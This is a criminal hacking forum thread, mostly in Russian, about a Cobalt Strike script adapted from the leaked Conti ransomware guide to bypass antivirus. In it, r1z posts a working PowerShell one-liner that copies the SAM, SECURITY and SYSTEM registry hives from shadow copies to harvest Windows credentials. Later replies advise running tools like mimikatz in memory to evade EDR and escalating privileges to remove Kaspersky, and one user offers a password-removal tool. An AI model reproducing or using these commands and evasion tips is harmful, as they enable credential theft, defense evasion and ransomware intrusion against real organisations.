Conti.r1z.Cobalt Strike обходной AV

[r1z]

Привет;

последнее руководство, опубликованное в Conti Guide; он был преобразован для прямого использования в сценарии CS; этот скрипт будет полезен здесь красным командам ...

Также просим всех читателей ознакомиться с конкурсом статей №6 »https: //xss.pro/threads/55078/

любые вопросы; пожалуйста, без пм .. просто напишите сюда

./r1z

 

[S0UlleG]

Привет;

последнее руководство, опубликованное в Conti Guide; он был преобразован для прямого использования в сценарии CS; этот скрипт будет полезен здесь красным командам ...

Также просим всех читателей ознакомиться с конкурсом статей №6 »https: //xss.pro/threads/55078/

любые вопросы; пожалуйста, без пм .. просто напишите сюда

./r1z

не понял, его подбрасывать в кобу как cna?

 

[r1z]

не понял, его подбрасывать в кобу как cna?

так; це сценарій кобальтстрайку; просто перейменуйте його на xssconti.cna і завантажте.

 

[S0UlleG]

так; це сценарій кобальтстрайку; просто перейменуйте його на xssconti.cna і завантажте.

Хакеры из Украины вас тут прям стало mnogo, нужно изучить код, скрипт типа отключает любой антивирус ?? только с правами Админа?

 

[r1z]

Хакеры из Украины вас тут прям стало mnogo, нужно изучить код, скрипт типа отключает любой антивирус ?? только с правами Админа?

во-первых, я не украинец, я с localhost) я просто говорю по-русски .. во-вторых, я упоминаю, кому нужен этот скрипт, он должен быть высокого уровня использования cobaltstrike; получить права администратора это можно будет в течение 5 секунд со мной.

 

[S0UlleG]

ты наверное меня не понял это был вопрос. я хотел узнать функционал скрипта без разборки его)) то вы профессионал в повышении прав?

во-первых, я не украинец, я с localhost) я просто говорю по-русски .. во-вторых, я упоминаю, кому нужен этот скрипт, он должен быть высокого уровня использования cobaltstrike; получить права администратора это можно будет в течение 5 секунд со мной.

 

[r1z]

ты наверное меня не понял это был вопрос. я хотел узнать функционал скрипта без разборки его)) то вы профессионал в повышении прав?

повышение прав в наши дни не обязательно должно быть профессиональным или непрофессиональным ... у вас есть обход UAC и другие многие техники ... даже последний эксплойт для получения прав администратора настолько прост для запуска сценария PowerShell;

https://www.bleepingcomputer[.]com/...bility-allows-anyone-to-get-admin-privileges/

powershell -c "foreach ($i in 1..10){$p='\\.\HarddiskVolumeShadowCopy{0}\windows\system32\config\' -f $i; gi $($p+'SAM'),$($p+'SECURITY'),$($p+'SYSTEM') -ErrorAction SilentlyContinue | % {cp $_.FullName $($_.BaseName+$i)}}"

 

[thesecure123]

what if i am on a user without password and there is Kaspersky endpoint protection

 

[r1z]

what if i am on a user without password and there is Kaspersky endpoint protection

Everycase have it own way; but keep in mind; running un behavior commands like mimikatz once you get the shell in cobaltstrike it's restrict your permissions sometimes; depend in the EDR or AV behavor; you should run your command "on-memory" without touching the disk.

i'll write about this in the next days; hope you already had been voted here: https://xss.pro/threads/55078/

 

[chapo]

what if i am on a user without password and there is Kaspersky endpoint protection

you mean you are not admin? escalate privileges and uninstall kaspersky, I see this very easy.

 

[kaspersky]

I think it is not very easy to increase the privileges on a machine with Kaspersky installed - even with clean tools, it just won't get off - maybe a password can be set to remove and change the antivirus itself, what methods do you use?

 

[chapo]

I think it is not very easy to increase the privileges on a machine with Kaspersky installed - even with clean tools, it just won't get off - maybe a password can be set to remove and change the antivirus itself, what methods do you use?

I have a tool for Kaspersky password removal, but guess you should run it with admin. If you need it DM.